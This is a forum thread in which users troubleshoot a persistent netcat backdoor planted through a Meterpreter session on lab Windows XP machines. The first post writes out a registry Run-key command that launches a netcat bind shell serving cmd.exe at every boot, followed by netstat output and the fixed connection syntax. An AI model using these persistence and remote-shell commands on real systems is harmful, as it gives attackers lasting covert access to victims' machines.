Results 1 to 3 of 3

Thread: nc backdoor dropped with meterperter not working...

  1. #1
    Member
    Join Date
    Sep 2007
    Posts
    58

    Default nc backdoor dropped with meterperter not working...

    guys, I dropped a backdoor "nc" into my testing machine "xp" with a meterpreter sessions, and edited the registry to start at bootup

    Code:
    meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"
    however, I'm not able to make connections to the port. NC does start and it is listening on port 455, but I can't connect. I did a nmap scan from attacker box, and that port it is not showing up as open. Firewall is disabled!

    Code:
    C:\>netstat -ano
    
    Active Connections
    
      Proto  Local Address          Foreign Address        State           PID
      TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1672
      TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       960
      TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1672
      TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
      TCP    0.0.0.0:455            0.0.0.0:0              LISTENING       3636
      TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1740
      TCP    172.16.10.105:139      0.0.0.0:0              LISTENING       4
      TCP    172.16.10.105:1191     172.16.10.106:8080     ESTABLISHED     1204
    got it fixed.... was using the wrong command to connect "nc x.x.x.x -p 455" instead of "nc x.x.x.x 455"...
    Last edited by Archangel-Amael; 08-21-2010 at 12:00 PM.

  2. #2
    Senior Member
    Join Date
    Jul 2009
    Posts
    135

    Default Re: nc backdoor dropped with meterperter not working...

    Props on figuring out your own problem. Crucial skill that every young hacker/cracker needs to develop and be good at.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Default Re: nc backdoor dropped with meterperter not working...

    I'm trying something similar..

    This is the situation :

    My work is done in a virtual lab.
    I'm trying to create a backdoor on a xp sp2 firewall enabled machine.
    i've got a meterpreter session on my virtual xpclient.
    First i tried installing metsvc with no luck..
    Secondly i tried to install a persistent netcat backdoor explained in metasploit unleashed tutorial
    again no luck...an open port is not created using this method.
    Any thoughts on what i'm doing wrong?


    thx

    ps : i think i found a typo in the Persistent Netcat Backdoor tutorial.

    "We open up port 445 in the firewall and double-check that it was set properly."

    Shouldnt that be 455 instead of 445?

    c

Similar Threads

  1. meterperter srcipts not functioning.
    By Nazagul in forum Beginners Forum
    Replies: 2
    Last Post: 07-14-2010, 04:20 PM
  2. How To Backdoor an OPN AP
    By Eatme in forum OLD Pentesting
    Replies: 23
    Last Post: 08-18-2009, 04:41 AM
  3. Brache hilfe bei Backdoor!
    By hardez in forum Anfänger Ecke
    Replies: 1
    Last Post: 06-18-2009, 08:01 PM
  4. nc backdoor daemon
    By smaila in forum OLD Newbie Area
    Replies: 2
    Last Post: 10-12-2008, 01:51 AM
  5. Hypothetical backdoor detection
    By fds42 in forum OLD Newbie Area
    Replies: 11
    Last Post: 01-12-2008, 06:26 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •